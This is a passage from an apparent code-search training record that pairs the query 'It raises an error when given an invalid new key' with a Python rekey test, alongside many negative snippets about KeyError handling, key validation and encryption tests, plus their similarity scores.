\"\"\"Mocked function to always raise an exception\"\"\"\n raise InvalidKeyError('foo', 'bar')\n\n self.client.login(username=self.student.username, password=self.password)\n with patch('opaque_keys.edx.keys.CourseKey.from_string', side_effect=mock_from_string):\n resp = self.client.get(self.get_url(self.student.username))\n\n assert resp.status_code == status.HTTP_404_NOT_FOUND\n assert 'error_code' in resp.data\n assert resp.data['error_code'] == 'invalid_course_key'", "def test_encrypt_no_key_id(self):\n encryptor = self.test_init()\n encryptor.key_id = None\n\n with self.assertRaises(IceItException):\n encryptor.encrypt('blah', 'blah-again')", "def test_setter_invalid_key(self):\n root = netapp_api.NaElement('root')\n try:\n root[None] = 'value'\n except Exception as e:\n if not isinstance(e, KeyError):\n self.fail(_('Error not a KeyError.'))", "def test_setter_invalid_key(self):\n root = netapp_api.NaElement('root')\n try:\n root[None] = 'value'\n except Exception as e:\n if not isinstance(e, KeyError):\n self.fail(_('Error not a KeyError.'))", "def key(self, value=None):\n if self.crypt_method == 'C':\n key_type = \"number\"\n else:\n key_type = \"string\"\n\n input_message = f\"Please enter a {key_type} as a \" \\\n f\"{self.crypt_type}ion key\\n>> \"\n if value is None:\n key = input(input_message)\n else:\n key = value\n\n is_valid_key, key = Check.is_valid_key(key, self.crypt_method)\n if is_valid_key:\n self._key = key\n else:\n raise ValueError(f\"Key{key} is invalid\")", "def revert(self, record, new_password):\n if self.old_key_deleted:\n if self.aws_sync_profile:\n if self.sync_with_creds_file():\n logging.info(\n f'New key id \"{self.new_key_id}\" was updated in profile \"{self.aws_sync_profile}\"'\n ' of AWS credentials file, but failed to update in Keeper record.'\n )\n else:\n logging.info(\n f'New key id {self.new_key_id} failed to update in profile \"{self.aws_sync_profile}\"'\n ' of AWS credentials file, and also failed to update in Keeper record.'\n )\n return False\n else:\n self.delete_key(new_key=True)", "def _KeyMissing(side):\n return 'Key missing from %s' % side", "def test_keys_failure(self):\n storage = Storage()\n storage._keys_dict = {'1': 'one',\n 'abc': '1'}\n self.assertRaises(StoragePatternError, storage.keys, 'ab[cd')", "def test01StoreExpiration(self):\n s = utils.FastStore(max_size=5)\n keys = []\n for i in range(0, 100):\n keys.append(s.Put(i, i))\n\n # This should not raise\n s.Get(keys[-1])\n\n # This should raise though\n self.assertRaises(KeyError, s.Get, keys[0])", "def test_blob_key():\n\tbackup_and_restore(\n\t\tlambda context: put_keys(lib.SET, BLOB_KEYS, \"foobar\", False),\n\t\tNone,\n\t\tlambda context: check_keys(lib.SET, BLOB_KEYS, \"foobar\", False)\n\t)", "def test_getObjectByKey_raises_KeyError(self):\n try:\n self.tile_bucket.getObjectByKey('foo_key')\n except KeyError:\n return\n assert(False)", "def test_neg_exists_key_invalid_data(self, key, ex_code, ex_msg):\n with pytest.raises(e.ParamError):\n key, _ = self.as_connection.exists(key)", "def test_create_key():\n\n assert symmetric.create_key() != \"\"", "def _newKey(self, key):\n pass", "def test_other_user_kvs_set_failure(self):\r\n with self.assertRaises(AssertionError):\r\n self.kvs.set(self.other_key_factory(self.existing_field_name), \"new_value\")", "def test_getKey_nokey(self):\n filename = os.path.join(os.getcwd(), 'sekrit')\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! type=%r\" % type(key))", "def testTokenToDataWithBadKey(self):\n key = createKey()\n data = {u'user': u'aliafshar'}\n token = dataToToken(key, data)\n self.assertRaises(ValueError, tokenToData, createKey(), token=token)", "def testBadKeyToToken(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey')", "def password_error(self, msg):\n raise NotImplementedError('password_error')", "def test_corrupted_login_key():\n buf = open_bmylogin_cnf(LOGIN_PATH_FILE)\n\n # Skip past the unused bytes\n buf.seek(4)\n\n # Write null bytes over half the login key\n buf.write(b'\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0')\n\n buf.seek(0)\n mylogin_cnf = read_and_decrypt_mylogin_cnf(buf)\n\n assert mylogin_cnf is None", "def test_encryption_public_key_not_given(self) -> None:\n\n given = \"Hello, World!\"\n\n encryptor = DataEncryption()\n\n self.assertRaises(ValueError, lambda: encryptor.encrypt_data(given))", "def DeriveKey(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def get_key(self, key_value):\n # Storing the correct key value back to the self.key attributes.\n self.key=key_value\n self.cryptor=Fernet(self.key)", "def test_plaintext_and_anoncrypt_raises_error(alice):\n with pytest.raises(ValueError):\n alice.pack({\"test\": \"test\"}, plaintext=True, anoncrypt=True)", "def test_integer_key():\n\tbackup_and_restore(\n\t\tlambda context: put_keys(lib.SET, INTEGER_KEYS, \"foobar\", False),\n\t\tNone,\n\t\tlambda context: check_keys(lib.SET, INTEGER_KEYS, \"foobar\", False)\n\t)", "def test_decryption_private_key_not_given(self) -> None:\n\n given = \"Hello, World!\"\n\n encryptor = DataEncryption()\n\n self.assertRaises(ValueError, lambda: encryptor.decrypt_data(given))", "def avoid_keyerror(dictionary, key):\n\t\"*** YOUR CODE HERE ***\"\n\ttry:\n\t\tvalue = dictionary[key]\n\texcept KeyError:\n\t\tprint('Avoid Exception')\n\t\tdictionary[key] = value = 'no value'\n\tfinally:\n\t\treturn value", "def test_config_key_error():\n c = core.Config()\n\n with pytest.raises(KeyError):\n c['doesNotExist']", "def test_use_privatekey_wrong_key(self, ctx_or_conn):\n key = PKey()\n key.generate_key(TYPE_RSA, 1024)\n ctx_or_conn.use_certificate(\n load_certificate(FILETYPE_PEM, root_cert_pem)\n )\n with pytest.raises(Error):\n ctx_or_conn.use_privatekey(key)", "def _invalid_transport_key_id():\n pecan.abort(404, u._('Not Found. Provided transport key id is invalid.'))", "def test_traversal_invalid_string(traversal_test_trie):\n with pytest.raises(KeyError):\n gen = traversal_test_trie.traversal('invalid')\n next(gen)", "def fail(team, chal, request):\n provided_key = request.form['key'].strip()\n wrong = WrongKeys(teamid=team.id, chalid=chal.id, ip=utils.get_ip(request), flag=provided_key)\n db.session.add(wrong)\n db.session.commit()\n db.session.close()", "def recover(self, error):\n raise error", "def isValidKey(key):\n return True", "def test_encrypt_nonce(self):\n key = b'0' * 32\n message = 'message'\n\n assert encrypt(message, key=key) != encrypt(message, key=key)", "def test_get_write_fail(self):\n os.chmod(self.test_key_filename, 0400)\n\n self.assertRaises(IOError, self.key_gen.get)", "def test_integer_key_stored():\n\tbackup_and_restore(\n\t\tlambda context: put_keys(lib.SET, INTEGER_KEYS, \"foobar\", True),\n\t\tNone,\n\t\tlambda context: check_keys(lib.SET, INTEGER_KEYS, \"foobar\", True)\n\t)", "def test_set_key_too_long(self):\n with RandomKeyTmpFile(128) as fname:\n command_line = self._MENU + [self._KEYNAME, \"--keyfile-path\", fname]\n self.check_error(StratisCliEngineError, command_line, _ERROR)", "def fail(self, key, **kwargs):\n return fail(self, key, **kwargs)", "def test_string_key():\n\tbackup_and_restore(\n\t\tlambda context: put_keys(lib.SET, STRING_KEYS, \"foobar\", False),\n\t\tNone,\n\t\tlambda context: check_keys(lib.SET, STRING_KEYS, \"foobar\", False)\n\t)", "def test_incorrect_decrypt_message(cipher):\n with pytest.raises(AssertionError):\n decrypted = cipher.decrypt('U6DQfhE17od2Qe4TPZFJHn3LOMkpPDqip77e4b5uv7s=')\n assert decrypted == 'Wrong string'", "def test_handle_key_error():\n\n @handle_key_error\n def get_item(key):\n data = {\"A\": 1, \"B\": 2}\n return data[key]\n\n value = get_item(\"A\")\n assert value == 1\n\n with pytest.raises(InvalidParameter) as exc:\n get_item(\"C\")\n\n assert \"C\" in str(exc.value)", "def test_empty_key_string(self):\n def x():\n y = pyamf.MixedArray()\n y.update({'': 1, 0: 1})\n self.encode(y)\n\n self.assertRaises(pyamf.EncodeError, x)", "def test_map_missing_key_encountered():\n with pytest.raises(KeyError):\n Map().read_key(10, b\"\")", "def _transport_key_not_found():\n pecan.abort(404, u._('Not Found. Transport Key not found.'))", "def test_get_read_fail(self):\n file_handler = open(self.test_key_filename, 'w')\n file_handler.write('Mock corrupt data')\n file_handler.close()\n os.chmod(self.test_key_filename, 000)\n\n self.assertRaises(IOError, self.key_gen.get)", "def test_invalid_signature(self):\n bundle = self._load_bundle_from_file(\n \"ksr-root-2016-q3-0.xml\", \"a6b6162e-b299-427e-b11b-1a8c54a08910\"\n )\n # validate signature is OK with the original key\n self.assertTrue(validate_signatures(bundle))\n key = bundle.keys.pop()\n _pk = base64.b64decode(key.public_key)\n # change the last byte of the public key\n _pk = _pk[:-1] + bytes([_pk[-1] + 1])\n new_key = Key(\n algorithm=key.algorithm,\n flags=key.flags,\n key_identifier=key.key_identifier,\n key_tag=key.key_tag,\n protocol=key.protocol,\n public_key=base64.b64encode(_pk),\n ttl=key.ttl,\n )\n bundle.keys.add(new_key)\n # test that the signature no longer validates\n with self.assertRaises(InvalidSignature):\n validate_signatures(bundle)", "def existing_key_fail(self, data, new_data):\n message = 'exists'\n rv = self.add_success(data)\n assert not in_response(rv, message)\n self.add_fail(data, message)\n rv = self.add_success(new_data)\n assert not in_response(rv, message)\n self.update_fail(data, message)\n assert self.verify_object(new_data)", "def raiseNonRecoverableError(msg):\n error(msg)\n raise NonRecoverableError(msg)", "def test_invalid_chars_ssck(self):\r\n valid_base = SlashSeparatedCourseKey(u'org.dept-1%2', u'course.sub-2%3', u'run.faster-4%5')\r\n for key in SlashSeparatedCourseKey.KEY_FIELDS:\r\n with self.assertRaises(InvalidKeyError):\r\n # this ends up calling the constructor where the legality check should occur\r\n valid_base.replace(**{key: u'funny thing'})", "def test_kms_encrypt_fails_client_error(self):\n self.mock_kms.encrypt.side_effect = self.client_error\n with self.assertRaises(SystemExit):\n ef_utils.kms_encrypt(self.mock_kms, self.service, self.env, self.secret)", "def test_44_password_reset_key_errors(self, Mock):\r\n self.register()\r\n user = User.query.get(1)\r\n userdict = {'user': user.name, 'password': user.passwd_hash}\r\n fakeuserdict = {'user': user.name, 'password': 'wronghash'}\r\n fakeuserdict_err = {'user': user.name, 'passwd': 'some'}\r\n fakeuserdict_form = {'user': user.name, 'passwd': 'p4ssw0rD'}\r\n key = signer.signer.dumps(userdict, salt='password-reset')\r\n returns = [BadSignature('Fake Error'), BadSignature('Fake Error'), userdict,\r\n fakeuserdict, userdict, userdict, fakeuserdict_err]\r\n\r\n def side_effects(*args, **kwargs):\r\n result = returns.pop(0)\r\n if isinstance(result, BadSignature):\r\n raise result\r\n return result\r\n Mock.side_effect = side_effects\r\n # Request with no key\r\n res = self.app.get('/account/reset-password', follow_redirects=True)\r\n assert 403 == res.status_code\r\n # Request with invalid key\r\n res = self.app.get('/account/reset-password?key=foo', follow_redirects=True)\r\n assert 403 == res.status_code\r\n # Request with key exception\r\n res = self.app.get('/account/reset-password?key=%s' % (key), follow_redirects=True)\r\n assert 403 == res.status_code\r\n res = self.app.get('/account/reset-password?key=%s' % (key), follow_redirects=True)\r\n assert 200 == res.status_code\r\n res = self.app.get('/account/reset-password?key=%s' % (key), follow_redirects=True)\r\n assert 403 == res.status_code\r\n\r\n # Check validation\r\n res = self.app.post('/account/reset-password?key=%s' % (key),\r\n data={'new_password': '',\r\n 'confirm': '#4a4'},\r\n follow_redirects=True)\r\n\r\n assert \"Please correct the errors\" in res.data, res.data\r\n\r\n res = self.app.post('/account/reset-password?key=%s' % (key),\r\n data={'new_password': 'p4ssw0rD',\r\n 'confirm': 'p4ssw0rD'},\r\n follow_redirects=True)\r\n\r\n assert \"You reset your password successfully!\" in res.data\r\n\r\n # Request without password\r\n res = self.app.get('/account/reset-password?key=%s' % (key), follow_redirects=True)\r\n assert 403 == res.status_code", "def testBadKeys(self):\n # Ignore access to protected members\n # pylint: disable=W0212\n self.assertRaises(DOLAPI._DOLAPIError,\n self.badauth.table,\n self.dataset,\n self.table)", "def _check_transform_key(key: Hashable) -> None:\n _test_hashable = hash(key) # The only 'real' way to make sure is hashable\n # if not isinstance(key, Hashable):\n # raise TypeError((type(key), \"transformation lookup key is not hashable\"))", "def test_invalid_key(self):\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('221b=\"starts with number\"')\n assert 'Invalid key' in str(err.value)\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('_=\"not assignable\"')\n assert 'Invalid key' in str(err.value)\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('o-o=\"invalid character\"')\n assert 'Invalid key' in str(err.value)", "def test_blob_key_stored():\n\tbackup_and_restore(\n\t\tlambda context: put_keys(lib.SET, BLOB_KEYS, \"foobar\", True),\n\t\tNone,\n\t\tlambda context: check_keys(lib.SET, BLOB_KEYS, \"foobar\", True)\n\t)", "def test_get_invalid_key(test_file):\n md = OSXMetaData(test_file.name)\n with pytest.raises(KeyError):\n md[\"invalid_key\"]", "def validate_key(key):\r\n try:\r\n secret.Secret(key)\r\n except secret.Secret.InvalidSecret as e:\r\n raise KeyIsInvalid(e.message)", "def setup_key_encrypt(self):\r\n\t\tself.max_key = math.floor(len(self.message) / 2)\r\n\t\twhile True:\r\n\t\t\tkey = input(f\"Please enter a key value less than or equal to {self.max_key}. --> \")\r\n\t\t\ttry:\r\n\t\t\t\tself.key = int(key)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint(\"Key needs to be a number.\")\r\n\t\t\t\tcontinue\r\n\t\t\tif self.key > self.max_key: \t\t\t\r\n\t\t\t\tprint(f\"{key} is too big of a number.\")\t\r\n\t\t\telif self.key == 0:\r\n\t\t\t\tprint(\"0 cannot be a key\")\t\t\t\r\n\t\t\telse:\t\t\t\r\n\t\t\t\tbreak", "def test_string_key_stored():\n\tbackup_and_restore(\n\t\tlambda context: put_keys(lib.SET, STRING_KEYS, \"foobar\", True),\n\t\tNone,\n\t\tlambda context: check_keys(lib.SET, STRING_KEYS, \"foobar\", True)\n\t)", "def test_incorrect_prediction_key(self):\n self._config['Prediction key'] = 'wrong_key'\n with self.assertRaisesRegex(ValueError, 'Invalid prediction key'):\n self._gen.generate(\n example=self._example,\n model=self._model,\n dataset=self._dataset,\n config=self._config)", "def encrypt():\n\tnull = 0", "def test_getKey_keyexists(self):\n filename = self.mktemp()\n with open(filename, 'wb') as fh:\n fh.write(SEKRIT_KEY)\n fh.flush()\n\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! type=%r\" % type(key))\n self.assertEqual(SEKRIT_KEY, key,\n \"\"\"The example key and the one read from file differ!\n key (in hex): %s\n SEKRIT_KEY (in hex): %s\"\"\"\n % (key.encode('hex'), SEKRIT_KEY.encode('hex')))", "def test_attempt_to_add_uid_key_causes_error():\n starting_db = create_db(STARTING_DB_INPUT)\n starting_db.put_item(\n Item={\n \"uid\": \"I can TOTALLY update someone else's object\"\n }\n )\n with pytest.raises(ValueError):\n o_obj.update_object_in_db(\n starting_db,\n \"some_uid\",\n json.dumps({\n \"uid\": \"I can TOTALLY update someone else's object\"\n })\n )", "def test_getitem_cleared_key(testchannel):\n key = testchannel.add(list)\n testchannel.remove(key)\n\n with pytest.raises(KeyError) as err:\n testchannel.__getitem__(key)\n\n assert err.value.args == (key, )", "def _reraise(*args, **keys):\n return True", "def fail(self, key: str, **kwargs):\n warnings.warn(\n '`Field.fail` is deprecated. Use `raise self.make_error(\"{}\", ...)` instead.'.format(\n key\n ),\n RemovedInMarshmallow4Warning,\n stacklevel=2,\n )\n raise self.make_error(key=key, **kwargs)", "def gpg_error(exception, message):\n LOGGER.debug(\"GPG Command %s\", ' '.join([str(x) for x in exception.cmd]))\n LOGGER.debug(\"GPG Output %s\", exception.output)\n raise CryptoritoError(message)", "def testKeyInfoTooShort(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='x', keyInfo='xx')", "def handle_key(self, k):\n\t\treturn False", "def test_real_world_malware(self):\n key = bytes.fromhex('0394d550fb286dda')\n data = bytes.fromhex('6bdb2c294e7e031c38e4adecaa8dc755')\n unit = self.load(key, raw=True)\n self.assertEqual(unit.decrypt(data).hex(), '4c5a495001b30026968e700017f7ec05')", "def Revert():\n raise Exception(0xF1F1F2F2F3F3F4F4)", "def test_get_key_digest_with_no_parameter(self):\n with pytest.raises(TypeError) as typeError:\n self.as_connection.get_key_digest()\n\n assert \"argument 'ns' (pos 1)\" in str(\n typeError.value)", "def test_key_without_signature(self):\n bundle = self._load_bundle_from_file(\n \"ksr-root-2016-q3-0.xml\", \"a6b6162e-b299-427e-b11b-1a8c54a08910\"\n )\n new_key = Key(\n key_identifier=\"ZSK-24315\",\n key_tag=24315,\n ttl=1978,\n flags=256,\n protocol=3,\n algorithm=AlgorithmDNSSEC.RSASHA1,\n public_key=base64.b64encode(b\"test key\"),\n )\n bundle.keys.add(new_key)\n # test that the signature no longer validates\n with self.assertRaises(InvalidSignature):\n validate_signatures(bundle)" ]
[ "0.7787494", "0.7165129", "0.7140279", "0.71330994", "0.69257516", "0.6686824", "0.6646899", "0.6348278", "0.6192973", "0.6057841", "0.60305434", "0.6001477", "0.5970502", "0.58401686", "0.5836722", "0.5806258", "0.5804228", "0.57949257", "0.57405263", "0.57361877", "0.5714895", "0.5691836", "0.5686841", "0.56837195", "0.5633617", "0.5630989", "0.5623438", "0.560158", "0.5600826", "0.5600826", "0.5571059", "0.55423266", "0.55292255", "0.5520465", "0.55142146", "0.5512181", "0.55018103", "0.54905087", "0.548471", "0.5466198", "0.54398763", "0.54397094", "0.5438906", "0.542902", "0.54280216", "0.5418787", "0.54184216", "0.5414903", "0.54133576", "0.5404434", "0.5381153", "0.53770536", "0.53694403", "0.5367749", "0.53648907", "0.5357562", "0.5355447", "0.5355117", "0.5355049", "0.535161", "0.53372896", "0.5331178", "0.5328484", "0.5327844", "0.53264123", "0.5313775", "0.5308364", "0.53025776", "0.5300799", "0.52870506", "0.52821803", "0.5280002", "0.5274749", "0.52673", "0.52672505", "0.5262957", "0.5250962", "0.52492076", "0.5246664", "0.5239189", "0.5238688", "0.523373", "0.5233719", "0.5226667", "0.52177286", "0.5213184", "0.5209179", "0.52002597", "0.5194084", "0.5190158", "0.5188901", "0.5182567", "0.5179232", "0.5178732", "0.51636124", "0.5159863", "0.5152981", "0.51511705", "0.51357424", "0.5130093" ]
0.82164097
0
It raises an error when given an invalid new key.
def test_rekey_key_format(self): old_key = b'0' * 32 encrypted = encrypt('message', key=old_key) with pytest.raises(EncryptionError): rekey(encrypted, old_key=old_key, new_key=b'1' * 31)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _newKey(self, key):\n pass", "def _check_key(self, key):\n raise NotImplementedError", "def test_rekey_non_encrypted(self):\n with pytest.raises(EncryptionError):\n rekey('message', old_key=b'0' * 32, new_key=b'1' * 32)", "def test_set_invalid_key(test_file):\n md = OSXMetaData(test_file.name)\n with pytest.raises(KeyError):\n md[\"invalid_key\"] = \"value\"", "def validate_key_throw(*args):\n validation_result = validate_key(*args)\n if not validation_result:\n raise ValueError(str(validation_result))\n return validation_result", "def test_invalid_keys(self):\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"this has spaces\", 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"key with spaces did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"\\x10control\\x02characters\\x11\", 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"key with control characters did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"a\" * (SERVER_MAX_KEY_LENGTH + 1), 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"long key did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(u\"unicode\\u4f1a\", 1)\n\t\texcept TypeError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"unicode key did not raise ValueError\")", "def existing_key_fail(self, data, new_data):\n message = 'exists'\n rv = self.add_success(data)\n assert not in_response(rv, message)\n self.add_fail(data, message)\n rv = self.add_success(new_data)\n assert not in_response(rv, message)\n self.update_fail(data, message)\n assert self.verify_object(new_data)", "def __missing__(self, key):\n global MISSING\n MISSING = key # For debugging - save name of missing key\n return INVALID", "def test_encrypt_key_invalid(self):\n with pytest.raises(EncryptionError):\n encrypt('message', key=b'0' * 31)", "def test_handle_key_error():\n\n @handle_key_error\n def get_item(key):\n data = {\"A\": 1, \"B\": 2}\n return data[key]\n\n value = get_item(\"A\")\n assert value == 1\n\n with pytest.raises(InvalidParameter) as exc:\n get_item(\"C\")\n\n assert \"C\" in str(exc.value)", "def isValidKey(key):\n return True", "def test_getObjectByKey_raises_KeyError(self):\n try:\n self.tile_bucket.getObjectByKey('foo_key')\n except KeyError:\n return\n assert(False)", "def test_keyerror(self):\n try:\n self.db['foo']\n except KeyError, e:\n assert \"no key 'foo' in database <SequenceFileDB\" in str(e), str(e)", "def test_duplicate_key_identifier(self):\n bundle = self._load_bundle_from_file(\n \"ksr-root-2016-q3-0.xml\", \"a6b6162e-b299-427e-b11b-1a8c54a08910\"\n )\n new_key = Key(\n key_identifier=list(bundle.keys)[0].key_identifier,\n key_tag=4711,\n ttl=1978,\n flags=256,\n protocol=3,\n algorithm=AlgorithmDNSSEC.RSASHA1,\n public_key=base64.b64encode(b\"test key\"),\n )\n bundle.keys.add(new_key)\n # test that the signature no longer validates\n with self.assertRaises(ValueError):\n validate_signatures(bundle)", "def testKeyInfoTooShort(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='x', keyInfo='xx')", "def test_get_invalid_key(test_file):\n md = OSXMetaData(test_file.name)\n with pytest.raises(KeyError):\n md[\"invalid_key\"]", "def test_keys_failure(self):\n storage = Storage()\n storage._keys_dict = {'1': 'one',\n 'abc': '1'}\n self.assertRaises(StoragePatternError, storage.keys, 'ab[cd')", "def keyError():\n d = {}\n d['cat']", "def testBadKeyToToken(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey')", "def validate_key(key):\r\n try:\r\n secret.Secret(key)\r\n except secret.Secret.InvalidSecret as e:\r\n raise KeyIsInvalid(e.message)", "def test_map_missing_key_encountered():\n with pytest.raises(KeyError):\n Map().read_key(10, b\"\")", "def test_neg_exists_key_invalid_data(self, key, ex_code, ex_msg):\n with pytest.raises(e.ParamError):\n key, _ = self.as_connection.exists(key)", "def test_setter_invalid_key(self):\n root = netapp_api.NaElement('root')\n try:\n root[None] = 'value'\n except Exception as e:\n if not isinstance(e, KeyError):\n self.fail(_('Error not a KeyError.'))", "def test_setter_invalid_key(self):\n root = netapp_api.NaElement('root')\n try:\n root[None] = 'value'\n except Exception as e:\n if not isinstance(e, KeyError):\n self.fail(_('Error not a KeyError.'))", "def _add_error(self, key, message):\n if key not in self._error_key_list:\n self._error_key_list.append(key)\n self.add_error(key, str(message))", "def corrupt(self, key):\n rand_bytes = random.getrandbits(8)\n byte_str = bytes([rand_bytes])\n self.client[key] = byte_str\n print('Corrupted %s in redis' % key)", "def test_wrong_key(self):\n with pytest.raises(FinderInsideProException) as ex:\n FinderInsidePro(\"\")\n assert FinderInsideProException.EXCEPTION_TEXT_KEY_NOT_SET in str(ex)\n assert ex.value.extype == FinderInsideProException.TYPE_KEY_IS_WRONG\n\n with pytest.raises(FinderInsideProException) as ex:\n FinderInsidePro('aaa')\n assert FinderInsideProException.EXCEPTION_TEXT_WRONG_KEY in str(ex)\n assert ex.value.extype == FinderInsideProException.TYPE_KEY_IS_WRONG", "def add_existing_key_fail(self, data):\n message = 'exists'\n rv = self.add_success(data)\n assert not in_response(rv, message)\n return self.add_fail(data, message)", "def testKeyInfoTooLong(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey',\n keyInfo='xxxxx')", "def test_missing_entry_raises_KeyError(self):\n with self.assertRaises(KeyError):\n self.phonebook.lookup(\"missing\")", "def test_attempt_to_add_uid_key_causes_error():\n starting_db = create_db(STARTING_DB_INPUT)\n starting_db.put_item(\n Item={\n \"uid\": \"I can TOTALLY update someone else's object\"\n }\n )\n with pytest.raises(ValueError):\n o_obj.update_object_in_db(\n starting_db,\n \"some_uid\",\n json.dumps({\n \"uid\": \"I can TOTALLY update someone else's object\"\n })\n )", "def test_invalid_key(self):\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('221b=\"starts with number\"')\n assert 'Invalid key' in str(err.value)\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('_=\"not assignable\"')\n assert 'Invalid key' in str(err.value)\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('o-o=\"invalid character\"')\n assert 'Invalid key' in str(err.value)", "def make_error(self, key: str, **kwargs) -> ValidationError:\n try:\n msg = self.error_messages[key]\n except KeyError as error:\n class_name = self.__class__.__name__\n message = (\n \"ValidationError raised by `{class_name}`, but error key `{key}` does \"\n \"not exist in the `error_messages` dictionary.\"\n ).format(class_name=class_name, key=key)\n raise AssertionError(message) from error\n if isinstance(msg, (str, bytes)):\n msg = msg.format(**kwargs)\n return ValidationError(msg)", "def __check_key_validity(self, key):\n if not isinstance(key, tuple):\n raise TypeError(\"key must be a tuple\")\n if len(key) != 2:\n raise ValueError(\"key must be of length two\")\n if not (isinstance(key[0], int) and isinstance(key[1], int)):\n raise TypeError(\"elements of key must be integers\")\n if not ((0 <= key[0] < self.m) and (0 <= key[1] < self.n)):\n raise exc.OutOfBoundsError(\"key is out of bounds\")", "def test_throws_item_missing_key(self):\n with pytest.raises(marshmallow.ValidationError):\n Item.Schema().loads(json.dumps(item_missing_key))", "def test_incorrect_prediction_key(self):\n self._config['Prediction key'] = 'wrong_key'\n with self.assertRaisesRegex(ValueError, 'Invalid prediction key'):\n self._gen.generate(\n example=self._example,\n model=self._model,\n dataset=self._dataset,\n config=self._config)", "def test_invalid_chars_location(self):\r\n course_key = SlashSeparatedCourseKey(u'org.dept-1%2', u'course.sub-2%3', u'run.faster-4%5')\r\n valid_base = course_key.make_usage_key('tomato-again%9', 'block-head:sub-4%9')\r\n for key in SlashSeparatedCourseKey.KEY_FIELDS:\r\n with self.assertRaises(InvalidKeyError):\r\n # this ends up calling the constructor where the legality check should occur\r\n valid_base.replace(**{key: u'funny thing'})", "def test_invalid(self):\n created = datetime.datetime(2019, 1, 1, tzinfo=datetime.timezone.utc)\n last_used = datetime.datetime(2019, 1, 2, tzinfo=datetime.timezone.utc)\n key = Key('user2', 'ldasfkk', 'Inactive', created, last_used)\n with pytest.raises(AssertionError):\n key.audit(5, 1, 1, 1)", "def _newKey(self, key):\n self._testKeySubNsAdd()\n self._getKeyList().append(key)", "def test_decrypt_key_invalid(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=b'0' * 31)", "def update_existing_key_fail(self, data, new_data):\n message = 'exists'\n rv = self.add_success(data)\n assert not in_response(rv, message)\n rv = self.add_success(new_data)\n assert not in_response(rv, message)\n rv = self.update_fail(data, message)\n assert self.verify_object(new_data)\n return rv", "def testTokenToDataWithBadKey(self):\n key = createKey()\n data = {u'user': u'aliafshar'}\n token = dataToToken(key, data)\n self.assertRaises(ValueError, tokenToData, createKey(), token=token)", "def test_decrypt_key_incorrect(self):\n right_key = b'0' * 32\n wrong_key = b'1' * 32\n\n encrypted = encrypt('message', key=right_key)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=wrong_key)", "def __missing__(self, key):\n return key", "def _KeyMissing(side):\n return 'Key missing from %s' % side", "def fail(self, key, **kwargs):\n return fail(self, key, **kwargs)", "def test_dweet_for_with_an_invalid_key(self):\n try:\n dweepy.dweet_for(self.my_thing_id, test_data, key='badkey')\n except dweepy.DweepyError as e:\n self.assertEqual(e.args[0], 'the key you provided doesn\\'t work with this thing')\n else:\n self.fail(\"shouldn't ever get called\")", "def _check_key(key): # type: (str) -> None\n if not key:\n raise ValueError('Key must not be empty.')\n if '.' in key:\n raise ValueError('Key must not contain dots.')", "def keychange(self):\n # if response.json()['error']['errors'][0]['reason']=='quotaExceeded':\n self.keyindex += 1\n if self.keyindex == len(self.keylist):\n self.keyindex = 0\n print('Keylist length reached')\n print('Changinf Key..')\n key = self.keylist[self.keyindex]\n print(\"Quota Exceeded\", self.keyindex)\n return key", "def test_get_single_different(single_bucket): # pylint: disable=redefined-outer-name\n with pytest.raises(KeyError):\n single_bucket.get(\"key 2\")", "def fail(self, key: str, **kwargs):\n warnings.warn(\n '`Field.fail` is deprecated. Use `raise self.make_error(\"{}\", ...)` instead.'.format(\n key\n ),\n RemovedInMarshmallow4Warning,\n stacklevel=2,\n )\n raise self.make_error(key=key, **kwargs)", "def test_invalid_signature(self):\n bundle = self._load_bundle_from_file(\n \"ksr-root-2016-q3-0.xml\", \"a6b6162e-b299-427e-b11b-1a8c54a08910\"\n )\n # validate signature is OK with the original key\n self.assertTrue(validate_signatures(bundle))\n key = bundle.keys.pop()\n _pk = base64.b64decode(key.public_key)\n # change the last byte of the public key\n _pk = _pk[:-1] + bytes([_pk[-1] + 1])\n new_key = Key(\n algorithm=key.algorithm,\n flags=key.flags,\n key_identifier=key.key_identifier,\n key_tag=key.key_tag,\n protocol=key.protocol,\n public_key=base64.b64encode(_pk),\n ttl=key.ttl,\n )\n bundle.keys.add(new_key)\n # test that the signature no longer validates\n with self.assertRaises(InvalidSignature):\n validate_signatures(bundle)", "def avoid_keyerror(dictionary, key):\n\t\"*** YOUR CODE HERE ***\"\n\ttry:\n\t\tvalue = dictionary[key]\n\texcept KeyError:\n\t\tprint('Avoid Exception')\n\t\tdictionary[key] = value = 'no value'\n\tfinally:\n\t\treturn value", "def __missing__(self, key):\n raise KeyNotInContextError(f\"{key} not found in the pypyr 